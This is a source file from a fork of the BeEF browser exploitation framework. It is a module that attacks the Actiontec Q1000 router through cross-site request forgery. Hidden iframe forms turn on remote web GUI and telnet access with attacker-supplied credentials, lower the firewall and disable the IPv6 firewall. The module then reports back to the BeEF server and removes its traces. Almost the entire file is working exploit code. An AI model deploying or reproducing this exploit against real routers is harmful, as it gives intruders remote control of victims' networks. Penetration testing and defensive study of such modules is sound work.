Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
83ed8558b76afddec1ff287d9604b7081d2ac216
beef/modules/exploits/router/actiontec_q1000_csrf/command.js

53 lines
2.4 KiB
JavaScript
Raw Blame History

//
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var gateway = '<%= @base %>';
var user = '<%= @user %>';
var passwd = '<%= @password %>';
var port = '<%= @port %>';
var timeout = 15;
var actiontec_q1000_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotegui.cgi", "POST", "application/x-www-form-urlencoded", [
{'type':'hidden', 'name':'serCtlHttp', 'value':'1'},
{'type':'hidden', 'name':'adminUserName', 'value':user},
{'type':'hidden', 'name':'adminPassword', 'value':passwd},
{'type':'hidden', 'name':'remGuiTimeout', 'value':'0'},
{'type':'hidden', 'name':'remGuiPort', 'value':port}
]);
var actiontec_q1000_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotetelnet.cgi", "POST", "application/x-www-form-urlencoded", [
{'type':'hidden', 'name':'serCtlTelnet', 'value':'1'},
{'type':'hidden', 'name':'remTelUser', 'value':user},
{'type':'hidden', 'name':'remTelPass', 'value':passwd},
{'type':'hidden', 'name':'remTelTimeout', 'value':'0'},
{'type':'hidden', 'name':'remTelPassChanged', 'value':'1'}
]);
var actiontec_q1000_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_firewallsettings.cgi", "POST", "application/x-www-form-urlencoded", [
{'type':'hidden', 'name':'fwLevel', 'value':'Basic'},
{'type':'hidden', 'name':'fwStealthMode', 'value':'0'}
]);
var actiontec_q1000_iframe4_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "ipv6_firewallsettings.cgi", "POST", "application/x-www-form-urlencoded", [
{'type':'hidden', 'name':'ipv6_fwlevel', 'value':'basic'},
{'type':'hidden', 'name':'ipv6_fwenable', 'value':'0'}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(actiontec_q1000_iframe1_<%= @command_id %>);
document.body.removeChild(actiontec_q1000_iframe2_<%= @command_id %>);
document.body.removeChild(actiontec_q1000_iframe3_<%= @command_id %>);
document.body.removeChild(actiontec_q1000_iframe4_<%= @command_id %>);
}
setTimeout("cleanup()", timeout*1000);
});
Reference in New Issue View Git Blame Copy Permalink